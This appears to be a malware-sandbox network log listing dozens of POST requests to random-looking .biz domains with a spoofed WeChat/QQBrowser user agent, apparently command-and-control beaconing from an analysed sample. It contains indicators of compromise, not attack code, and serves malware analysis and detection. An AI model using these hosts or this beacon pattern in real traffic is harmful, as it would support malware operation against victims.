                        Source: global traffic | HTTP traffic detected: POST /vydffyeediqodv HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: knjghuig.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /eybmhvtk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /ovtsne HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: knjghuig.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /ebm HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /oiarwfji HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /tookpqdumsvuivi HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /tqkivcurvenplovb HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /dh HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /dltqf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /augbqjw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /kqmqy HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: xlfhhhm.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /b HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ifsaia.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /rkqsyeybt HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: saytjshyf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /wpydads HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: saytjshyf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /aymirwrcjb HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vcddkls.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /qntnr HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: fwiwk.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /vfgrjxuhtsfio HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: fwiwk.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /agsuui HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /icvb HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: tbjrpv.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /mjdasdrrrpdajiq HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: deoci.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /cpggj HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: gytujflc.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /ywcfdqaloklmslqo HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: gytujflc.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /nw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: qaynky.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /daho HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: bumxkqgxu.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /txk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: dwrqljrr.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /bcfyebuhgunon HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: xlfhhhm.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /vvpppdyli HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: nqwjmb.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /wyuhsg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ifsaia.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /fgdugwxcbebce HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ytctnunms.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /ahktjonxxxw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: myups.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /fcdeynfdvmpui HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: saytjshyf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /ucfcvy HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vcddkls.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /mwix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /exvjfnyxjxwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /pclybqvqlknkyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /bmriyxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /sy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /faellchgtux HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /eboqedbjpoqnvpqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /dxiykgktglw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /jwx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /glpq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ymfaswtstxnaa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /vmxdnohruim HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qwtkmqbsexpiki HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /nnsrvdrwdsdf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /alkfibvhvyencmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /qunavwbhgmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /boysd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /eoodskndsap HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ccgjbojtfwpjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /tqpwjhvmbc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /couv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /wa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /nmtgacidyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /dkbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ghraajhdo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ubujpwkxvgqviqf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qgkrosoxeed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /gkytxybgvmhelx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /yiteaphcawxhusdi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /nfkiqboumamba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
